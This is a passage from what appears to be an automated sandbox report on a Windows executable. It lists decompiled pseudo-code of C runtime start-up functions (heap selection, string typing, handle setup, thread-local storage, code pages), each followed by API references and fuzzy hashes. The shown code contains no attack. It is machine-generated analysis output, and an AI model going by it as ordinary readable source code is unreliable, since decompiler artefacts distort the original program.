							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00413CC0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00417DA0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x42353c; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x41bdf8, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x41bdf4, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x423558 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}





















                              0x00418a6f
                              0x00418a71
                              0x00418a76
                              0x00418a81
                              0x00418a82
                              0x00418a89
                              0x00418a8f
                              0x00418a92
                              0x00418a9b
                              0x00418adb
                              0x00418ade
                              0x00418b07
                              0x00000000
                              0x00418b0d
                              0x00418b10
                              0x00418b12
                              0x00418b17
                              0x00418b17
                              0x00418b27
                              0x00418b31
                              0x00418b37
                              0x00418b3c
                              0x00000000
                              0x00418b3e
                              0x00418b3e
                              0x00418b4b
                              0x00418b50
                              0x00418b53
                              0x00418b55
                              0x00418b5b
                              0x00418b70
                              0x00418b76
                              0x00000000
                              0x00418b78
                              0x00418b87
                              0x00418b8f
                              0x00000000
                              0x00418b91
                              0x00418b99
                              0x00418b99
                              0x00418b8f
                              0x00418b76
                              0x00418b3c
                              0x00418ae0
                              0x00418ae0
                              0x00418ae5
                              0x00418ae7
                              0x00418ae7
                              0x00418af9
                              0x00418af9
                              0x00418a9d
                              0x00418aa0
                              0x00418aa3
                              0x00418ab3
                              0x00418acd
                              0x00418ba1
                              0x00418ba1
                              0x00418ad3
                              0x00418ad5
                              0x00000000
                              0x00418ad5
                              0x00418ab5
                              0x00418ab5
                              0x00418ad6
                              0x00418ad6
                              0x00000000
                              0x00418ad6
                              0x00418ab3
                              0x00418ba9
                              0x00418bb4

                              APIs
                              • GetStringTypeW.KERNEL32(00000001,0041BDF8,00000001,?,747170F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AAB
                              • GetStringTypeA.KERNEL32(00000000,00000001,0041BDF4,00000001,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AC5
                              • GetStringTypeA.KERNEL32(?,?,?,?,004186BE,747170F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AF9
                              • MultiByteToWideChar.KERNEL32(?,004256C5,?,?,00000000,00000000,747170F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418B31
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,004186BE,?), ref: 00418B87
                              • GetStringTypeW.KERNEL32(?,?,00000000,004186BE,?,?,?,?,?,?,004186BE,?), ref: 00418B99
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: StringType$ByteCharMultiWide
                              • String ID:
                              • API String ID: 3852931651-0
                              • Opcode ID: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                              • Instruction ID: e288f18e772608454304c6360a88be647065f5ca3cb36798b5d5ed4d75a3f5a0
                              • Opcode Fuzzy Hash: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                              • Instruction Fuzzy Hash: B0416DB2600219BFCF208F94DC86EEF7F79EB08794F10442AF915D2250D7389991CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004158B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E004158B0(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E00413CC0(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E00415883( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00417D60("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E00417CE0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00417C20(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E004179F0(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}


















                              0x004158b8
                              0x004158c5
                              0x004158d7
                              0x004158ed
                              0x00000000
                              0x004158ed
                              0x0041590c
                              0x004159e2
                              0x004159e6
                              0x004159f0
                              0x00000000
                              0x004159f2
                              0x00415914
                              0x00415920
                              0x00415922
                              0x00415922
                              0x00415926
                              0x0041592e
                              0x0041592e
                              0x00415930
                              0x00415931
                              0x00415922
                              0x0041594d
                              0x00415964
                              0x00415970
                              0x00415976
                              0x00415978
                              0x00415978
                              0x0041597c
                              0x00415984
                              0x00415984
                              0x00415986
                              0x00415987
                              0x00415978
                              0x00415999
                              0x0041594f
                              0x0041594f
                              0x0041594f
                              0x004159a2
                              0x00000000
                              0x00000000
                              0x004159a7
                              0x004159b0
                              0x00000000
                              0x00000000
                              0x004159b2
                              0x004159b3
                              0x004159b7
                              0x004159b9
                              0x004159bc
                              0x004159c2
                              0x004159be
                              0x004159be
                              0x004159be
                              0x004159c3
                              0x004159b9
                              0x004159cb
                              0x004159d6
                              0x00000000
                              0x00000000
                              0x004159f7

                              APIs
                              • GetVersionExA.KERNEL32 ref: 004158CF
                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00415904
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00415964
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: EnvironmentFileModuleNameVariableVersion
                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                              • API String ID: 1385375860-4131005785
                              • Opcode ID: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                              • Instruction ID: 007b09a40ac423c1d447adb87a92c2e34be193f5817f586218815b66d4303cb2
                              • Opcode Fuzzy Hash: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                              • Instruction Fuzzy Hash: 403177F1961648EDEF3196709C82BDF3B78DB46324F2400DBD185D6242E6388EC68B1B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00417641 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                              Download Yara Rule
                              C-Code - Quality: 99%
                              			E00417641() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00413E65(0x480);
				if(_t89 == 0) {
					E00414C0C(0x1b);
				}
				 *0x425900 = _t89;
				 *0x425a00 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x425900; // 0x520630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x425900; // 0x520630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x425a00);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x425a00 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x425900[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x425904;
					while(1) {
						_t69 = E00413E65(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x425a00 =  *0x425a00 + 0x20;
						__eflags =  *0x425a00;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x425a00 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x425a00; // 0x20
					goto L18;
				}
			}




























                              0x00417654
                              0x00417659
                              0x0041765d
                              0x00417662
                              0x00417663
                              0x00417669
                              0x00417673
                              0x00417673
                              0x00417679
                              0x0041767d
                              0x00417681
                              0x00417684
                              0x00417688
                              0x0041768c
                              0x00417691
                              0x00417694
                              0x00417694
                              0x0041769f
                              0x004176a5
                              0x004176aa
                              0x00417781
                              0x00417781
                              0x00417781
                              0x00417783
                              0x00417783
                              0x00417789
                              0x0041778c
                              0x00417790
                              0x00417793
                              0x004177e2
                              0x004177e2
                              0x004177e2
                              0x00000000
                              0x004177e2
                              0x00417795
                              0x00417797
                              0x0041779b
                              0x004177a7
                              0x004177a9
                              0x004177a9
                              0x0041779d
                              0x0041779f
                              0x0041779f
                              0x004177b3
                              0x004177b5
                              0x004177b8
                              0x004177d1
                              0x004177d1
                              0x004177ba
                              0x004177bb
                              0x004177c1
                              0x004177c3
                              0x00000000
                              0x00000000
                              0x004177c5
                              0x004177ca
                              0x004177cc
                              0x004177cf
                              0x004177d7
                              0x004177da
                              0x004177dc
                              0x004177dc
                              0x00000000
                              0x004177da
                              0x00000000
                              0x004177cf
                              0x004177e6
                              0x004177e6
                              0x004177e7
                              0x004177e7
                              0x004177fc
                              0x004177fc
                              0x004176b0
                              0x004176b3
                              0x004176b5
                              0x00000000
                              0x00000000
                              0x004176bb
                              0x004176bd
                              0x004176c3
                              0x004176cb
                              0x004176cd
                              0x004176cf
                              0x004176cf
                              0x004176d1
                              0x004176d7
                              0x0041772f
                              0x0041772f
                              0x00417731
                              0x00417733
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417735
                              0x00417735
                              0x00417738
                              0x0041773a
                              0x0041773d
                              0x00000000
                              0x00000000
                              0x0041773f
                              0x00417741
                              0x00417743
                              0x00000000
                              0x00000000
                              0x00417745
                              0x00417747
                              0x00417754
                              0x0041775b
                              0x0041775b
                              0x00417768
                              0x00417770
                              0x00417774
                              0x00000000
                              0x00417774
                              0x0041774a
                              0x00417750
                              0x00417752
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417777
                              0x00417777
                              0x0041777b
                              0x0041777c
                              0x0041777d
                              0x0041777d
                              0x00000000
                              0x004176d9
                              0x004176d9
                              0x004176de
                              0x004176e3
                              0x004176e8
                              0x004176eb
                              0x00000000
                              0x00000000
                              0x004176ed
                              0x004176ed
                              0x004176f4
                              0x004176f6
                              0x004176f6
                              0x004176fc
                              0x004176fc
                              0x004176fe
                              0x00000000
                              0x00000000
                              0x00417700
                              0x00417704
                              0x00417707
                              0x0041770b
                              0x00417711
                              0x00417714
                              0x00417714
                              0x0041771c
                              0x0041771f
                              0x00417725
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417727
                              0x00417729
                              0x00000000
                              0x00417729

                              APIs
                              • GetStartupInfoA.KERNEL32(?), ref: 0041769F
                              • GetFileType.KERNEL32(?,?,00000000), ref: 0041774A
                              • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004177AD
                              • GetFileType.KERNEL32(00000000,?,00000000), ref: 004177BB
                              • SetHandleCount.KERNEL32 ref: 004177F2
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileHandleType$CountInfoStartup
                              • String ID:
                              • API String ID: 1710529072-0
                              • Opcode ID: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                              • Instruction ID: 1521dec5194d53324a877df202082dadc936f581ec6971422c000dc394b087b4
                              • Opcode Fuzzy Hash: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                              • Instruction Fuzzy Hash: 39510B716086458FC7208B28D8847A67BB0FB11378F65866ED5B2C72E0D738A886C759
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00403AA7 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E00403AA7(signed int __ecx) {
				short _v6;
				char _v12;
				short _t12;
				short _t27;
				int _t29;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_v6 = __ecx;
				if(__ecx != 0) {
					_t27 = CharUpperW(__ecx & 0x0000ffff);
					if(_t27 != 0 || GetLastError() != 0x78) {
						_t12 = _t27;
					} else {
						_t29 = WideCharToMultiByte(0, 0,  &_v6, 1,  &_v12, 4, 0, 0);
						if(_t29 != 0 && _t29 <= 4) {
							 *((char*)(_t30 + _t29 - 8)) = 0;
							CharUpperA( &_v12);
							MultiByteToWideChar(0, 0,  &_v12, _t29,  &_v6, 1);
						}
						_t12 = _v6;
					}
				} else {
					_t12 = 0;
				}
				return _t12;
			}









                              0x00403aaa
                              0x00403aab
                              0x00403ab3
                              0x00403ab7
                              0x00403ac8
                              0x00403acc
                              0x00403b21
                              0x00403ad9
                              0x00403aef
                              0x00403af3
                              0x00403afd
                              0x00403b02
                              0x00403b15
                              0x00403b15
                              0x00403b1b
                              0x00403b1b
                              0x00403ab9
                              0x00403ab9
                              0x00403ab9
                              0x00403b27

                              APIs
                              • CharUpperW.USER32(00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AC2
                              • GetLastError.KERNEL32(?,00000000,00000000,?,00403B6F), ref: 00403ACE
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AE9
                              • CharUpperA.USER32(?,?,00000000,00000000,?,00403B6F), ref: 00403B02
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,00000000,00000000,?,00403B6F), ref: 00403B15
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Char$ByteMultiUpperWide$ErrorLast
                              • String ID:
                              • API String ID: 3939315453-0
                              • Opcode ID: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                              • Instruction ID: 0842cb939f6927aecb542cd9758d214692c03acffe84293a02396fd76ee0080f
                              • Opcode Fuzzy Hash: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                              • Instruction Fuzzy Hash: B30144B65001197ADB20ABE49CC9DEBBA7CDB08259F414572F942A3281E3756E4487B8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00415523 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00415523() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x420740);
				if(_t16 == 0) {
					_t16 = E00416EFC(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x420740, _t16) == 0) {
						E00414C0C(0x10);
					} else {
						E00415510(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}






                              0x00415531
                              0x00415539
                              0x0041553d
                              0x00415548
                              0x0041554e
                              0x00415578
                              0x00415561
                              0x00415562
                              0x00415568
                              0x0041556e
                              0x00415572
                              0x00415572
                              0x0041554e
                              0x0041557f
                              0x00415589

                              APIs
                              • GetLastError.KERNEL32(00000103,7FFFFFFF,00416EEF,00417BBE,00000000,?,?,00000000,00000001), ref: 00415525
                              • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00415533
                              • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041557F
                                • Part of subcall function 00416EFC: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00416FF2
                              • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00415557
                              • GetCurrentThreadId.KERNEL32 ref: 00415568
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorLastValue$AllocCurrentHeapThread
                              • String ID:
                              • API String ID: 2020098873-0
                              • Opcode ID: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                              • Instruction ID: cede6b9146d9eee740ee2dfbc4b23865fcca372efd47330e9e203dd76af2c63a
                              • Opcode Fuzzy Hash: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                              • Instruction Fuzzy Hash: 09F09635A01611BBC7312B74AC096DB3E62EB857A1B51413AF551962A4DB28888196EC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00417E3A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E00417E3A(int _a4) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				signed int _t40;
				signed int _t41;
				int _t43;
				signed int _t47;
				signed int _t49;
				int _t50;
				signed char* _t51;
				signed int _t55;
				signed char* _t57;
				signed int _t60;
				intOrPtr* _t63;
				signed int _t65;
				signed char _t66;
				signed char _t68;
				signed char _t69;
				signed int _t70;
				void* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				void* _t85;

				E0041570A(0x19);
				_t50 = E00417FE7(_a4);
				_t85 = _t50 -  *0x4256c8; // 0x4e4
				_a4 = _t50;
				if(_t85 != 0) {
					__eflags = _t50;
					if(_t50 == 0) {
						L30:
						E00418064();
					} else {
						_t65 = 0;
						__eflags = 0;
						_t36 = 0x422af8;
						while(1) {
							__eflags =  *_t36 - _t50;
							if( *_t36 == _t50) {
								break;
							}
							_t36 = _t36 + 0x30;
							_t65 = _t65 + 1;
							__eflags = _t36 - 0x422be8;
							if(_t36 < 0x422be8) {
								continue;
							} else {
								_t43 = GetCPInfo(_t50,  &_v28);
								_t81 = 1;
								__eflags = _t43 - _t81;
								if(_t43 != _t81) {
									__eflags =  *0x423510;
									if( *0x423510 == 0) {
										_t77 = _t81 | 0xffffffff;
										__eflags = _t77;
									} else {
										goto L30;
									}
								} else {
									 *0x4258e4 =  *0x4258e4 & 0x00000000;
									_t60 = 0x40;
									__eflags = _v28 - _t81;
									memset(0x4257e0, 0, _t60 << 2);
									asm("stosb");
									 *0x4256c8 = _t50;
									if(__eflags <= 0) {
										 *0x4256dc =  *0x4256dc & 0x00000000;
										__eflags =  *0x4256dc;
									} else {
										__eflags = _v22;
										if(_v22 != 0) {
											_t63 =  &_v21;
											while(1) {
												_t69 =  *_t63;
												__eflags = _t69;
												if(_t69 == 0) {
													goto L24;
												}
												_t49 =  *(_t63 - 1) & 0x000000ff;
												_t70 = _t69 & 0x000000ff;
												while(1) {
													__eflags = _t49 - _t70;
													if(_t49 > _t70) {
														break;
													}
													 *(_t49 + 0x4257e1) =  *(_t49 + 0x4257e1) | 0x00000004;
													_t49 = _t49 + 1;
												}
												_t63 = _t63 + 2;
												__eflags =  *(_t63 - 1);
												if( *(_t63 - 1) != 0) {
													continue;
												}
												goto L24;
											}
										}
										L24:
										_t47 = _t81;
										do {
											 *(_t47 + 0x4257e1) =  *(_t47 + 0x4257e1) | 0x00000008;
											_t47 = _t47 + 1;
											__eflags = _t47 - 0xff;
										} while (_t47 < 0xff);
										 *0x4258e4 = E00418031(_t50);
										 *0x4256dc = _t81;
									}
									_t71 = 0x4256d0;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L31:
									E0041808D(_t50, _t71);
									goto L1;
								}
							}
							goto L33;
						}
						_v8 = _v8 & 0x00000000;
						_t55 = 0x40;
						memset(0x4257e0, 0, _t55 << 2);
						_t79 = _t65 + _t65 * 2 << 4;
						__eflags = _t79;
						asm("stosb");
						_t16 = _t79 + 0x422b08; // 0x422b08
						_t51 = _t16;
						do {
							__eflags =  *_t51;
							_t57 = _t51;
							if( *_t51 != 0) {
								while(1) {
									_t17 =  &(_t57[1]); // 0xdf
									_t66 =  *_t17;
									__eflags = _t66;
									if(_t66 == 0) {
										goto L21;
									}
									_t41 =  *_t57 & 0x000000ff;
									_t74 = _t66 & 0x000000ff;
									__eflags = _t41 - _t74;
									if(_t41 <= _t74) {
										_t19 = _v8 + 0x422af0; // 0x8040201
										_t68 =  *_t19;
										do {
											 *(_t41 + 0x4257e1) =  *(_t41 + 0x4257e1) | _t68;
											_t41 = _t41 + 1;
											__eflags = _t41 - _t74;
										} while (_t41 <= _t74);
									}
									_t57 =  &(_t57[2]);
									__eflags =  *_t57;
									if( *_t57 != 0) {
										continue;
									}
									goto L21;
								}
							}
							L21:
							_v8 = _v8 + 1;
							_t51 =  &(_t51[8]);
							__eflags = _v8 - 4;
